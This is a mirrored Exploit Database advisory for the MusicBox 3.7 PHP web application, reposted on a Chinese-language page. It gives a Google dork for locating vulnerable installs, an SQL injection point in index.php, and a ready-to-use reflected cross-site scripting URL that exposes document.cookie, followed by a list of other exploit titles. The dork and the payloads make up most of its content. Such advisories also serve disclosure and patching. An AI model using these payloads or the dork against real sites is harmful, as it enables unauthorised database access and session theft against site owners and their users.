MusicBox 3.7 – Multiple Vulnerabilities

Exploit Database
13 阅读

作者： R@1D3N

日期： 2011-07-25
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/17570/

============================================================
MusicBox <= v3.7 Multiple Vulnerabilities
============================================================


[~] Author : R@1D3N (amin emami)

[~] Software Link : www.musicboxv2.com

[~] Price : $275

[~] Version : v3.7 and previous versions

[~] Contact : aminrayden@yahoo.com <~

[~] DorK : inurl:genre_artists.php

[~] Forum : http://ashiyane.org/forums/

[~] Greetz :ItSecTeam, Inj3ct0r, Exploit-db

[~] Tested on: Windows XP Sp3

vul1.sql injection:

/[Path]/index.php?action=top&type=Songs&show=10'[ SQL ATTACK]

Vul2.Cross site Scripting:

/[path]/index.php?in=song&term="><script>alert(document.cookie)<%2Fscript>&action=search&start=0

last Exploits
MusicBox 3.7 – Multiple Vulnerabilities的更多信息

Piwigo Plugin Facetag 0.0.3 – Cross-Site Scripting：
NUUO NVRmini 2 3.0.8 – Remote Command Injection (Shellshock)：
WBCE CMS Version 1.6.1 – Remote Command Execution (Authenticated)：
TOPSEC Firewalls – ‘ELIGIBLECANDIDATE’ Remote Code Execution：
PHP Dashboards NEW 4.4 – Arbitrary File Read：
OTRS Open Technology Real Services 3.1.4 – Persistent Cross-Site Scripting：
Joomla! < 1.6.5 - Multiple Cross-Site Scripting Vulnerabilities：
OpenEMR 5.0.0 – Remote Code Execution (Authenticated)：